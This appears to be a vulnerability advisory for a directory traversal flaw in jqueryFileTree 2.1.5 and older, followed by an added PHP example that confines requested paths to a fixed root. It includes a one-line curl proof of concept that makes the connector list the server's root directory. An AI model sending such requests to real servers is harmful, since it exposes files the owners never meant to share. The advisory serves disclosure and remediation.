Lack of data validation - Path Traversal In jqueryfiletree

Description

jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal.

POC:

curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
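The missing validation, shown as an added example (not jqueryFileTree's own code): a connector resolves the posted `dir` value against a fixed root and refuses anything that ends up outside it. `TREE_ROOT`, `resolve_tree_dir()` and the sample directory names are hypothetical and constructed for this illustration.

```php
<?php
// Added example, not the project's code. TREE_ROOT is a hypothetical setting:
// the only directory the connector is allowed to list.
const TREE_ROOT = '/var/www/files';

/**
 * Resolve a client-supplied "dir" value to a real directory inside $root.
 * Returns the canonical path, or null when the request must be refused.
 */
function resolve_tree_dir(string $root, string $dir): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false || strpos($dir, "\0") !== false) {
        return null;
    }
    // Treat the value as relative to the root, so "dir=/" means the root
    // itself and not the filesystem root.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . ltrim($dir, '/\\'));
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // realpath() has collapsed ".." and followed symlinks, so a plain prefix
    // comparison on the canonical paths is now meaningful.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed sample tree so the example runs offline.
$root = sys_get_temp_dir() . '/tree_demo_' . getmypid();
@mkdir($root . '/docs', 0700, true);

foreach (['/', 'docs/', '../', 'docs/../../', '/etc/'] as $dir) {
    $resolved = resolve_tree_dir($root, $dir);
    printf("%-12s => %s\n", $dir, $resolved ?? 'refused');
}
```

In a connector, the value passed as `$dir` would be `$_POST['dir']` and the root would be `TREE_ROOT`; a `null` result should end the request without listing anything.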

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
